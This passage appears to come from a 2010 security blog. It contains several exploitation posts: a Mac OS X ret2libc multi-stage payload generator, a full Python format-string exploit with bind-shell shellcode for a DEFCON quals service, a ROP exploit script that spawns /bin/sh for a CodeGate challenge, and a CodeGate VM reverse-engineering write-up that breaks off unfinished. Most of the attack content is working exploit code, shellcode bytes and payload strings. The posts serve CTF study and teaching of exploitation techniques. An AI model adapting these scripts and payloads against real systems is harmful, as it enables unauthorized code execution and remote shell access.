Simple Mac OS X ret2libc exploit (x86)
October 5, 2010 by longld · 2 Comments
Talking about buffer overflow exploit on x86, Mac OS X is the most easy and hacker friendly target compare to Linux or Windows. OS X always loads /usr/lib/dyld at a fixed location and it contains a lot of helper stubs to launch the exploit. If you want something advanced likes ROP (Return-Oriented-Programming) exploit you may have a look at “Mac OS X Return-Oriented Exploitation” and thorough step-by-step guide “OSX ROP Exploit – EvoCam Case Study“. But actually, we don’t need ROP for 32-bit exploitation on OS X, simple ret2libc is enough and straightforward to implement. Let take a look at multi-stage ret2libc exploit on OS X.
The target
Under OSX, dyld is always loaded at a fixed location with __IMPORT page is RWX as shown below:
__TEXT 8fe00000-8fe0b000 [ 44K] r-x/rwx SM=COW /usr/lib/dyld __TEXT 8fe0b000-8fe0c000 [ 4K] r-x/rwx SM=PRV /usr/lib/dyld __TEXT 8fe0c000-8fe42000 [ 216K] r-x/rwx SM=COW /usr/lib/dyld __LINKEDIT 8fe70000-8fe84000 [ 80K] r--/rwx SM=COW /usr/lib/dyld __DATA 8fe42000-8fe44000 [ 8K] rw-/rwx SM=PRV /usr/lib/dyld __DATA 8fe44000-8fe6f000 [ 172K] rw-/rwx SM=COW /usr/lib/dyld __IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld
Our target is to transfer the desired shellcode to the __IMPORT section of dyld then execute it. We can simply do this with byte-per-byte copy way of ROPEME. There is some disadvantages with this method:
- Payload size is large, around 10 times of actual shellcode
- We have to re-generate the whole payload when changing to new shellcode
With OS X we can do it better as there is a RWX page at static location.
Staging payload
The most complicated part of ROP technique is “stack pivoting” or ESP register control under ASLR. By executing a small shellcode we can take ESP under control easily. Our multi-stage payload will look like:
Stage-2: actual shellcode
This is the last stage in our multi-stage payload. Any NULL-free shellcode can be used, e.g bind shell code from Metasploit.
Stage-1: shellcode loader for stage-2 payload
This stage will transfer stage-2 payload on stack to __IMPORT section (RWX) of dyld then executes it. The transfer function is _strcpy() in dyld. Below small shellcode will be executed on RWX page to perform the job:
# 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # src -> &shellcode # 50 push eax # dst -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode)
Stage-0: ret2libc loader for stage-1 payload
This stage will transfer 7 bytes of stage-1 payload to our RWX location using repeated _strcpy() calls, then executes it. We lookups the dyld for necessary byte values and copy it to the target byte-per-byte.
In summary, there is some advantages with our multi-stage payload:
- Straightforward to implement: only ret2libc calls, no gadget is required
- Payload size overhead is small: around 100 bytes
- Independent, generic loader code: no need to regenerate the whole payload, just append a new shellcode to make new payload
Automated payload generator
Let put all this together and make an automated payload generator in Python.
- Select the target
#__IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld TARGET = 0x8fe6f010 # to avoid NULL byte # dyld base address DYLDADDR = 0x8fe00000
- Extract dyld’s i386 code
# $ otool -f /usr/lib/dyld # ... #architecture 1 # cputype 7 # cpusubtype 3 # capabilities 0x0 # offset 352256 # size 368080 # align 2^12 (4096) # ... DYLDFILE = "/usr/lib/dyld" DYLDCODE = open(DYLDFILE, "rb").read() DYLDCODE = DYLDCODE[352256 : 352256+368080]
- _strcpy() call
# $ nm -arch i386 /usr/lib/dyld | grep _strcpy # 8fe2db10 t _strcpy STRCPY = 0x8fe2db10 # $ otool -arch i386 -tv /usr/lib/dyld | grep pop -A2 | grep ret -B1 | grep pop # 8fe28790 popl %edi # 8fe2b3d4 popl %edi POP2RET = 0x8fe2878f
- stage-1
# stage1 # 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # dst -> &shellcode # 50 push eax # src -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode) STAGE1 = "\x58\x5b\x54\x50\x50\x53\xc3"
- stage-0
# stage0: _strcpy sequences STAGE0 = gen_stage0(DYLDCODE, STAGE1)
Below is the stage-0 payload loader generated for OS X 10.6.4:
STAGE0 = ( "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f"
"\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" )
Test the payload with simple buffer overflow:
bash-3.2$ ./vuln "`python -c 'print "A"*272 + "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" + "\xcc"*4'` ... Trace/BPT trap bash-3.2$
Looking for the next? Maybe “Mac OS X ROP exploit on x86_64″ someday.
ROPEME – ROP Exploit Made Easy
ROPEME – ROP Exploit Made Easy – is a PoC tool for ROP exploit automation on Linux x86. It contains a set of simple Python scripts to generate and search for ROP gadgets from binaries and libraries (e.g libc). A sample payload class is also included to help generate multistage ROP payload with the technique described in the Black Hat USA 2010 talk: “Payload already inside: data re-use for ROP exploits“.
Check the latest paper and slides and PoC code.
And take a look at the demo video below:
Enjoy ROPing!
DEFCON 18 Quals: Pwtent Pwnables 500 esd2 exploit
May 28, 2010 by longld · Leave a Comment
CLGT did not solved this during the quals! Here is the exploit for the esd2 leaked from pp200 (thanks beist for sharing). More analysis & write up for the real pp500 will come later:
#!/usr/bin/env python
import socket
import struct
import telnetlib
import time
HOST = '192.168.56.101'
PORT = 8302
def xor_input(data):
static = "%5d | %5d\n" + "\x00"*4
out = ""
for i in range(len(data)):
out += chr(ord(static[i]) ^ ord(data[i]))
return out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# send password
s.send("sp3wn0w" + "\n")
# prepare the payload
# overwrite lseek@plt, original value = 0x08048ae2
target = 0x804a30c
# shellcode address = 0x0804a040 + 142 bytes (padding + fmt_string)
ret = 0x0804a0ce
# value to write into target
write_byte = 0xa0ce
# payload = target + padding(128 - 4) + 14 (fmt_string) + shellcode
padding = "A"*128
fmt_string = "%" + str(write_byte) + "u%24$hn"
fmt_string = xor_input(fmt_string)
# bindshell: port 5678
shellcode = "\x00\x29\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63\x7d\xa9\x09\x83\xeb\xfc\xe2\xf4\x09\x1c\xf1\x90\x31\x15\xb9\x0b\x75\x53\x20\xe8\x31\x3f\xfb\x4b\x31\x17\xb9\xc4\xe3\xe4\x3a\x58\x30\x2f\xc3\x61\x3b\xb0\x29\xb9\x09\xb0\x29\x5b\x30\x2f\x19\x17\xae\xfd\x3e\x63\x61\x24\xc3\x53\x3b\x2c\xfe\x58\xae\xfd\xe0\x70\x96\x2d\xc1\x26\x4c\x0e\xc1\x61\x4c\x1f\xc0\x67\xea\x9e\xf9\x5d\x30\x2e\x19\x32\xae\xfd\xa9\x09"
payload = struct.pack("<L", target) + padding[4:] + fmt_string + shellcode + "\n"
print "Sending payload...", repr(payload)
s.send("c\n" + str(len(payload)) +"\n")
s.send(payload)
# trigger the read_blob that calls lseek()
s.send("r\n" + "10\n")
print "Connecting to remote shell port 5678..."
time.sleep(4)
t = telnetlib.Telnet(HOST, 5678)
t.write("id\n\n")
t.interact()
t.close()
s.close()
Return-oriented-programming practice: exploiting CodeGate 2010 Challenge 5
April 18, 2010 by longld · 4 Comments
In my previous post about CodeGate 2010 Challenge 5 exploit, I mentioned the weakness of accessing server to get execl() address. In this post I will show how to blindly exploit the “harder” program without access to the remote server using return-oriented-programming technique.
ROP introduction
A worth to read post about ROP introduction can be found on Zynamics blog: http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/
In summary: we will use return-into-instructions (called gadgets) to build and execute our payload when controlled EIP and ESP from vulnerable program.
ROP limitations (difficulties):
- ASLR: the same as return-into-libc, it’s difficult to locate address of instructions in library (e.g libc)
- ASCII-armor address: with ascii-armor remapping of libraries (e.g libc), addresses will contain NULL byte so chaining return-into-libc calls and ROP is impossible if there’s NULL filter in input
The “harder” case
Fortunately, we can blindly exploit the “harder” program using ROP because it provides some “advantages” in code:
- getline(): can pass NULL byte to input
- printf(): can leak runtime memory info (bypass ASLR)
Finding ROP gadgets
Our target is to invoke execve(”/bin/sh”, 0, 0) syscall, which is equivalent to prepare registers’ value then trigger kernel syscall:
eax = 0xb // execve
ebx = address of “/bin/sh”
ecx = 0 // argv
edx = 0 // env
Searching in harder binary, we found below gadgets:
- eax:
80483a4: 58 pop %eax 80483a5: 5b pop %ebx 80483a6: c9 leave 80483a7: c3 ret
- ebx & ecx:
8048634: 59 pop %ecx 8048635: 5b pop %ebx 8048636: c9 leave 8048637: c3 ret
“/bin/sh” is placed on target buffer, its address is available by leaking via printf()
- edx:
There’s no edx related gadget but observing that when returned from memcpy() edx’s value is set to esi so we can assign esi to 0×0 first then return again to main to nullify edx.0x001ba506 : mov edx,esi 80485e6: 5e pop %esi 80485e7: 5f pop %edi 80485e8: 5d pop %ebp 80485e9: c3 ret
- syscall:
In recent Linux kernel, syscall is usually performed via linux gate: call gs:[0x10]. By return to back to printf() in harder program many times, we can find the offset from getline() to first syscall is 319 bytes.
- moving stack:
After “leave; ret” our stack will be moved to new location pointing by ebp. We can control this by set ebp back to somewhere in the middle of target buffer.
Exploit code
#!/usr/bin/env python
import socket
import sys
import struct
import telnetlib
#host = 'ctf4.codegate.org'
host = '127.0.0.1'
port = 9005
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect((host, port))
buf=""
# bypass first read
buf = c.recv(1024)
# getline() address
buf = "A"*268 + struct.pack('i', 0x08048524) + struct.pack('i', 0x0804a008) + "\n"
c.send(buf)
buf = c.recv(1024)
addr = ""
getline_addr = int(buf[:4][::-1].encode('hex'), 16)
print "getline() is at:", hex(getline_addr)
# call gs:[0x10] address
offset = 319 # first offset is 319 bytes from getline()
syscall_addr = getline_addr + offset
# buffer address
buf = "%7$x" + "\x00"*260 + struct.pack('i', 0x08048521)*2 + "\n"
c.send(buf)
buf = c.recv(1024)
input_addr = int(buf[:8], 16)
print "Buffer address is at: ", hex(input_addr)
# gadgets address
pop_eax = 0x080483a4
pop_ecx_ebx = 0x08048634
pop_esi = 0x080485e6
# pop esi
buf = "A"*268 + struct.pack('i', pop_esi) + "\x00" * 12 + struct.pack('i', 0x08048524)*2 + "\n"
c.send(buf)
c.recv(1024)
# pop eax then move stack to new address
input_addr += 560 # lifting after 2 getline() calls
new_stack = input_addr+8
buf = "/bin/sh\x00" # /bin/sh
buf += struct.pack('i', new_stack+16) # next ebp after leave from pop_eax
buf += struct.pack('i', pop_ecx_ebx) # next is pop_ecx_ebx
buf += "\x00"*4 # ecx
buf += struct.pack('i', input_addr) # ebx -> /bin/sh
buf += "A"*4 # un-used ebp after leave from pop_ecx_ebx
buf += struct.pack('i', syscall_addr)
buf = buf.ljust(264, "A") # padding
buf += struct.pack('i', new_stack) # new ebp
buf += struct.pack('i', pop_eax)
buf += "\x0b\x00\x00\x00" # execve syscal
buf += "A"*4 # un-used ebx
buf += "\n"
print "Sending final payload ..."
c.send(buf)
c.send("id 2>&1" + "\n"*5)
t = telnetlib.Telnet()
t.sock = c
t.interact()
c.close()
CodeGate 2010 Challenge 2 – Xbox pwned
March 19, 2010 by RD · 19 Comments
Summary
This is the most interesting challenge in CodeGate 2010 IMHO. The binary is a VM which loads the ‘codefile’ and execute it. The VM codefile is protected from being tampered with a TEA based hash algorithm. By exploiting the weakness of hash algorithm (similar to Xbox hack) together with a bug inside VM, we could change the execution flow of VM code to get back the secret key content.
Analysis
Challenge information
credentials: ssh hugh@ctf4.codegate.org -p 9474 password=takeitaway
Exploit /home/hugh/yboy to read secret.key
There are yboy, codefile and secret.key files in the home directory of hugh (you can download these files here if you want to try it by yourself)
-rw-r–r– 1 codegate codegate 1136 2010-03-12 14:45 codefile
-r——– 1 daryl daryl 140 2010-03-12 15:27 secret.key
-rwsr-xr-x 1 daryl root 22307 2010-03-12 16:07 yboy
a. Reverse Engineering yboy
yboy basically does the following things
- load VM codes from the codefile into memory (code[])
- load content of secret.key into memory (data[])
- check for the integrity of codefile using TEA based hash algorithm against a hard-coded hash value. Exit if the hash not matched
- parse/decode loaded VM codes and execute it accordingly
For the VM code inside codefile
- ask user to input password
- compare the input with flag inside secret.key
- if correct, print out the flag
- otherwise, print out access denied error and exit
b. Decompiler for codefile
Since yboy load VM code from codefile and execute it, I wrote a decompiler for it
#include <stdio.h>
#include <stdlib.h>
unsigned char *decode[32] = {
"halt", "push", "pop", "add", "sub", "or", "xor", "nor", "shl",
"shr", "not", "nop", "branch", "jumpreg", "callreg", "load",
"store", "halt", "inputchar", "outputchar", "set_imm", "reload",
"rrandom", "nop", "nop", "nop", "nop", "nop", "nop", "nop", "nop",
"nop",
};
unsigned long registers[64];
unsigned long code[32768];
unsigned int PC;
int main(int argc, char **argv)
{
unsigned int ins;
unsigned char reg;
unsigned char imm1, imm2;
unsigned char opcode;
unsigned int codesize;
int set_imm = 1;
FILE *f;
f = fopen(argv[1], "r");
codesize = fread(code, 1, sizeof(code), f);
fclose(f);
//check_code();
PC = 0;
while (PC < (codesize) / 4) {
set_imm = 1;
ins = code[PC];
opcode = (ins >> 24); //& 0x1f;
reg = (ins >> 16) & 0xFF;
imm1 = (ins >> 8) & 0xFF;
imm2 = (unsigned char) ins;
// set_imm
if (opcode == 20) {
printf("%04x: \tr%d = %s %x, %x", PC, reg,
decode[opcode & 0x1f], imm1, imm2);
if (imm2 && !imm1)
printf("\t; %c", imm2);
else if (imm1)
printf("\t; %04x", imm2 + (imm1 << 8));
printf("\n");
PC++;
continue;
}
reg = (ins >> 16) & 0xBF;
imm1 = (ins >> 8) & 0xBF;
imm2 = ins & 0xBF;
printf("%04x: \tr%d = %s r%d, r%d", PC, reg,
decode[opcode & 0x1f], imm1, imm2);
if (opcode == 12) // comment for branch
printf("\t; if (r%d) goto r%d\n", imm1, imm2);
else
printf("\n");
PC++;
}
return 0;
}
Here is the output of the decompiler (click to open)
rd@jps(~/working/ctf/codegate2010/2/)$ ./yboy-decompile codefile 0000: r1 = set_imm 0, 45 ; E 0001: r0 = outputchar r1, r0 0002: r1 = set_imm 0, 6e ; n 0003: r0 = outputchar r1, r0 0004: r1 = set_imm 0, 74 ; t 0005: r0 = outputchar r1, r0 0006: r1 = set_imm 0, 65 ; e 0007: r0 = outputchar r1, r0 0008: r1 = set_imm 0, 72 ; r 0009: r0 = outputchar r1, r0 000a: r1 = set_imm 0, 20 ; 000b: r0 = outputchar r1, r0 000c: r1 = set_imm 0, 70 ; p 000d: r0 = outputchar r1, r0 000e: r1 = set_imm 0, 61 ; a 000f: r0 = outputchar r1, r0 0010: r1 = set_imm 0, 73 ; s 0011: r0 = outputchar r1, r0 0012: r1 = set_imm 0, 73 ; s 0013: r0 = outputchar r1, r0 0014: r1 = set_imm 0, 77 ; w 0015: r0 = outputchar r1, r0 0016: r1 = set_imm 0, 6f ; o 0017: r0 = outputchar r1, r0 0018: r1 = set_imm 0, 72 ; r 0019: r0 = outputchar r1, r0 001a: r1 = set_imm 0, 64 ; d 001b: r0 = outputchar r1, r0 001c: r1 = set_imm 0, 3e ; > 001d: r0 = outputchar r1, r0 001e: r1 = set_imm 0, 3e ; > 001f: r0 = outputchar r1, r0 0020: r60 = set_imm 0, ff ; � 0021: r61 = set_imm 0, 1 ; 0022: r4 = set_imm 5, 39 ; 0539 0023: r3 = inputchar r0, r0 0024: r50 = set_imm 0, a ; 0025: r0 = store r4, r3 0026: r0 = nop r0, r0 0027: r10 = sub r3, r50 0028: r10 = not r10, r0 0029: r11 = set_imm 0, 2f ; / 002a: r0 = branch r10, r11 ; if (r10) goto r11 002b: r4 = add r61, r4 002c: r10 = sub r60, r3 002d: r11 = set_imm 0, 23 ; # 002e: r0 = branch r10, r11 ; if (r10) goto r11 002f: r19 = set_imm 5, 39 ; 0539 0030: r20 = set_imm 0, 0 0031: r21 = set_imm 0, 23 ; # 0032: r21 = sub r21, r20 0033: r21 = not r21, r0 0034: r22 = set_imm 0, 5e ; ^ 0035: r0 = branch r21, r22 ; if (r21) goto r22 0036: r21 = load r20, r0 0037: r25 = add r19, r20 0038: r0 = nop r0, r0 0039: r26 = load r25, r0 003a: r26 = sub r21, r26 003b: r22 = set_imm 0, 41 ; A 003c: r0 = branch r26, r22 ; if (r26) goto r22 003d: r23 = set_imm 0, 1 ; 003e: r20 = add r20, r23 003f: r22 = set_imm 0, 31 ; 1 0040: r0 = branch r22, r22 ; if (r22) goto r22 0041: r1 = set_imm 0, 41 ; A 0042: r0 = outputchar r1, r0 0043: r1 = set_imm 0, 63 ; c 0044: r0 = outputchar r1, r0 0045: r1 = set_imm 0, 63 ; c 0046: r0 = outputchar r1, r0 0047: r1 = set_imm 0, 65 ; e 0048: r0 = outputchar r1, r0 0049: r1 = set_imm 0, 73 ; s 004a: r0 = outputchar r1, r0 004b: r1 = set_imm 0, 73 ; s 004c: r0 = outputchar r1, r0 004d: r1 = set_imm 0, 20 ; 004e: r0 = outputchar r1, r0 004f: r1 = set_imm 0, 44 ; D 0050: r0 = outputchar r1, r0 0051: r1 = set_imm 0, 65 ; e 0052: r0 = outputchar r1, r0 0053: r1 = set_imm 0, 6e ; n 0054: r0 = outputchar r1, r0 0055: r1 = set_imm 0, 69 ; i 0056: r0 = outputchar r1, r0 0057: r1 = set_imm 0, 65 ; e 0058: r0 = outputchar r1, r0 0059: r1 = set_imm 0, 64 ; d 005a: r0 = outputchar r1, r0 005b: r1 = set_imm 0, a ; 005c: r0 = outputchar r1, r0 005d: r0 = halt r0, r0 005e: r1 = set_imm 0, 47 ; G 005f: r0 = outputchar r1, r0 0060: r1 = set_imm 0, 72 ; r 0061: r0 = outputchar r1, r0 0062: r1 = set_imm 0, 65 ; e 0063: r0 = outputchar r1, r0 0064: r1 = set_imm 0, 65 ; e 0065: r0 = outputchar r1, r0 0066: r1 = set_imm 0, 74 ; t 0067: r0 = outputchar r1, r0 0068: r1 = set_imm 0, 7a ; z 0069: r0 = outputchar r1, r0 006a: r1 = set_imm 0, 20 ; 006b: r0 = outputchar r1, r0 006c: r1 = set_imm 0, 68 ; h 006d: r0 = outputchar r1, r0 006e: r1 = set_imm 0, 61 ; a 006f: r0 = outputchar r1, r0 0070: r1 = set_imm 0, 63 ; c 0071: r0 = outputchar r1, r0 0072: r1 = set_imm 0, 6b ; k 0073: r0 = outputchar r1, r0 0074: r1 = set_imm 0, 65 ; e 0075: r0 = outputchar r1, r0 0076: r1 = set_imm 0, 72 ; r 0077: r0 = outputchar r1, r0 0078: r1 = set_imm 0, 73 ; s 0079: r0 = outputchar r1, r0 007a: r1 = set_imm 0, 2e ; . 007b: r0 = outputchar r1, r0 007c: r1 = set_imm 0, 20 ; 007d: r0 = outputchar r1, r0 007e: r1 = set_imm 0, 4b ; K 007f: r0 = outputchar r1, r0 0080: r1 = set_imm 0, 65 ; e 0081: r0 = outputchar r1, r0 0082: r1 = set_imm 0, 65 ; e 0083: r0 = outputchar r1, r0 0084: r1 = set_imm 0, 70 ; p 0085: r0 = outputchar r1, r0 0086: r1 = set_imm 0, 20 ; 0087: r0 = outputchar r1, r0 0088: r1 = set_imm 0, 75 ; u 0089: r0 = outputchar r1, r0 008a: r1 = set_imm 0, 70 ; p 008b: r0 = outputchar r1, r0 008c: r1 = set_imm 0, 20 ; 008d: r0 = outputchar r1, r0 008e: r1 = set_imm 0, 74 ; t 008f: r0 = outputchar r1, r0 0090: r1 = set_imm 0, 68 ; h 0091: r0 = outputchar r1, r0 0092: r1 = set_imm 0, 65 ; e 0093: r0 = outputchar r1, r0 0094: r1 = set_imm 0, 20 ; 0095: r0 = outputchar r1, r0 0096: r1 = set_imm 0, 67 ; g 0097: r0 = outputchar r1, r0 0098: r1 = set_imm 0, 6f ; o 0099: r0 = outputchar r1, r0 009a: r1 = set_imm 0, 6f ; o 009b: r0 = outputchar r1, r0 009c: r1 = set_imm 0, 64 ; d 009d: r0 = outputchar r1, r0 009e: r1 = set_imm 0, 20 ; 009f: r0 = outputchar r1, r0 00a0: r1 = set_imm 0, 77 ; w 00a1: r0 = outputchar r1, r0 00a2: r1 = set_imm 0, 6f ; o 00a3: r0 = outputchar r1, r0 00a4: r1 = set_imm 0, 72 ; r 00a5: r0 = outputchar r1, r0 00a6: r1 = set_imm 0, 6b ; k 00a7: r0 = outputchar r1, r0 00a8: r1 = set_imm 0, 2e ; . 00a9: r0 = outputchar r1, r0 00aa: r1 = set_imm 0, 20 ; 00ab: r0 = outputchar r1, r0 00ac: r1 = set_imm 0, 53 ; S 00ad: r0 = outputchar r1, r0 00ae: r1 = set_imm 0, 74 ; t 00af: r0 = outputchar r1, r0 00b0: r1 = set_imm 0, 61 ; a 00b1: r0 = outputchar r1, r0 00b2: r1 = set_imm 0, 79 ; y 00b3: r0 = outputchar r1, r0 00b4: r1 = set_imm 0, 20 ; 00b5: r0 = outputchar r1, r0 00b6: r1 = set_imm 0, 73 ; s 00b7: r0 = outputchar r1, r0 00b8: r1 = set_imm 0, 68 ; h 00b9: r0 = outputchar r1, r0 00ba: r1 = set_imm 0, 61 ; a 00bb: r0 = outputchar r1, r0 00bc: r1 = set_imm 0, 72 ; r 00bd: r0 = outputchar r1, r0 00be: r1 = set_imm 0, 70 ; p 00bf: r0 = outputchar r1, r0 00c0: r1 = set_imm 0, 2e ; . 00c1: r0 = outputchar r1, r0 00c2: r1 = set_imm 0, 20 ; 00c3: r0 = outputchar r1, r0 00c4: r1 = set_imm 0, 44 ; D 00c5: r0 = outputchar r1, r0 00c6: r1 = set_imm 0, 69 ; i 00c7: r0 = outputchar r1, r0 00c8: r1 = set_imm 0, 73 ; s 00c9: r0 = outputchar r1, r0 00ca: r1 = set_imm 0, 6f ; o 00cb: r0 = outputchar r1, r0 00cc: r1 = set_imm 0, 62 ; b 00cd: r0 = outputchar r1, r0 00ce: r1 = set_imm 0, 65 ; e 00cf: r0 = outputchar r1, r0 00d0: r1 = set_imm 0, 79 ; y 00d1: r0 = outputchar r1, r0 00d2: r1 = set_imm 0, 20 ; 00d3: r0 = outputchar r1, r0 00d4: r1 = set_imm 0, 6d ; m 00d5: r0 = outputchar r1, r0 00d6: r1 = set_imm 0, 69 ; i 00d7: r0 = outputchar r1, r0 00d8: r1 = set_imm 0, 73 ; s 00d9: r0 = outputchar r1, r0 00da: r1 = set_imm 0, 69 ; i 00db: r0 = outputchar r1, r0 00dc: r1 = set_imm 0, 6e ; n 00dd: r0 = outputchar r1, r0 00de: r1 = set_imm 0, 66 ; f 00df: r0 = outputchar r1, r0 00e0: r1 = set_imm 0, 6f ; o 00e1: r0 = outputchar r1, r0 00e2: r1 = set_imm 0, 72 ; r 00e3: r0 = outputchar r1, r0 00e4: r1 = set_imm 0, 6d ; m 00e5: r0 = outputchar r1, r0 00e6: r1 = set_imm 0, 61 ; a 00e7: r0 = outputchar r1, r0 00e8: r1 = set_imm 0, 74 ; t 00e9: r0 = outputchar r1, r0 00ea: r1 = set_imm 0, 69 ; i 00ec: r1 = set_imm 0, 6f ; o 00ed: r0 = outputchar r1, r0 00ee: r1 = set_imm 0, 6e ; n 00ef: r0 = outputchar r1, r0 00f0: r1 = set_imm 0, 2e ; . 00f1: r0 = outputchar r1, r0 00f2: r1 = set_imm 0, a ; 00f3: r0 = outputchar r1, r0 00f4: r1 = set_imm 0, 59 ; Y 00f5: r0 = outputchar r1, r0 00f6: r1 = set_imm 0, 6f ; o 00f7: r0 = outputchar r1, r0 00f8: r1 = set_imm 0, 75 ; u 00f9: r0 = outputchar r1, r0 00fa: r1 = set_imm 0, 72 ; r 00fb: r0 = outputchar r1, r0 00fc: r1 = set_imm 0, 20 ; 00fd: r0 = outputchar r1, r0 00fe: r1 = set_imm 0, 66 ; f 00ff: r0 = outputchar r1, r0 0100: r1 = set_imm 0, 6c ; l 0101: r0 = outputchar r1, r0 0102: r1 = set_imm 0, 61 ; a 0103: r0 = outputchar r1, r0 0104: r1 = set_imm 0, 67 ; g 0105: r0 = outputchar r1, r0 0106: r1 = set_imm 0, 20 ; 0107: r0 = outputchar r1, r0 0108: r1 = set_imm 0, 69 ; i 0109: r0 = outputchar r1, r0 010a: r1 = set_imm 0, 73 ; s 010b: r0 = outputchar r1, r0 010c: r1 = set_imm 0, 3a ; : 010d: r0 = outputchar r1, r0 010e: r1 = set_imm 0, 20 ; 010f: r0 = outputchar r1, r0 0110: r29 = set_imm 0, 1 ; 0111: r30 = xor r30, r30 0112: r1 = load r30, r0 0113: r0 = outputchar r1, r0 0114: r30 = add r29, r30 0115: r31 = set_imm 0, 26 ; & 0116: r31 = sub r30, r31 0117: r32 = set_imm 1, 12 ; 0112 0118: r0 = branch r31, r32 ; if (r31) goto r32 0119: r1 = set_imm 0, a ; 011a: r0 = outputchar r1, r0 011b: r0 = halt r0, r0
Pseudo C code of the decompiled codefile
// data is an int array - int data[0x2000/4]
// the first 140 bytes of data store the content of "secret.key" file
printf("Enter password>>");
r4 = 1337;
while (!EOF) {
r3 = getc();
data[r4] = r3;
if (r3 == '\n') break;
r4++;
}
r19 = 1337;
r20 = 0;
while (1) {
if (r20 == 0x23) goto correctpass;
if (data[r20] != data[r19+r20]) goto wrongpass;
r20++;
}
wrongpass:
printf("Access Denied\n");
exit(0);
correctpass:
printf("Greetz hackers. Keep up the good work. Stay sharp. Disobey misinformation.\n");
printf("Your flag is: ");
for(i=0; i<0x26; i++)
print("%c", data[i]);
printf("\n");
c. Xbox’s TEA hash collision
From the decompiled VM code above, if we could modify the content of codefile, it would be possible to print out the flag inside secret.key stored at data[0]. However, the codefile is protected from being tampered with a hash algorithm.
int
check_code()
{
int result;
unsigned int v1;
unsigned int v2;
unsigned int i;
hash_block(0x99999999, 0xBBBBBBBB, 0x44444444, 0x55555555, code[0],
code[1], &v2, &v1);
for (i = 2; i <= 32766; i += 2)
hash_block(v2, v1, v2, v1, code[i], code[i + 1], (int *) &v2,
(int *) &v1);
if (v2 != 0x1EC0A9F0 || (result = v1, v1 != 0x9217F034)) {
puts("Tampering detected. Prepare for imminent arrest.");
exit(0);
}
return result;
}
Google the constant 0×61C88647 and searching around, I found that it’s a TEA based hash algorithm. Using TEA hash is bad and there is a weakness in the algorithm in which by flipping the 32nd and 64th bit of a 64 bits block, the hash value will remain the same. Xbox was hacked because of this one. (Actually I didn’t know about Xbox’s TEA bits flipping attack. I found this collision by writing a tool doing the brute force on bits flipping of 64 bits block to find the collision. Later, I realized that Yboy is Xbox with two bits flipped)
Now, the next problem is to find how codefile should be patched to print out the flag.
d. Branch instruction handing bug
The 32nd and 64th bit of a 64 bits block are MSB bits of the opcode field of two consequence instructions. Since the code only uses the least 05 bits in opcode for instruction decode, changing the MSB of the opcode won’t affect the instruction decode part. However, there is a problem with branch instruction handling code which will help us to modify the behavior of branch.
If we look at the VM parsing code, an instruction (4 byes) structure is as the following
[ opcode ] [ output register ] [ imm1 ] [ imm2 ]
opcode = (ins >> 24); //& 0x1f;
reg = (ins >> 16) & 0xFF;
imm1 = (ins >> 8) & 0xFF;
imm2 = (unsigned char) ins;
The least 05 bits of opcode are being used as an index to lookup for the corresponding function from the decode function table (decode[opcode & 0x1f])
Lets look deeper at the code handling ‘branch’ instruction:
int branch(int imm1, int imm2)
{
if (imm1)
PC = imm2;
else
PC++;
return 0;
}
Inside main()
As we can see, it only uses the least five bits of opcode ((ins >> 24) & 0×1f) for decode while the full byte (ins >> 24) is used for comparing later (opcode value for branch is oxC).
If we set the MSB of opcode, the opcode would become 0×8c. In this case, the branch() function is still being called, however, the (opcode == 0xC) check in main() will be false and PC will be increased by 1 unexpectedly.
e. Subvert the code flow to print out the flag
Look back at the decompiled VM code
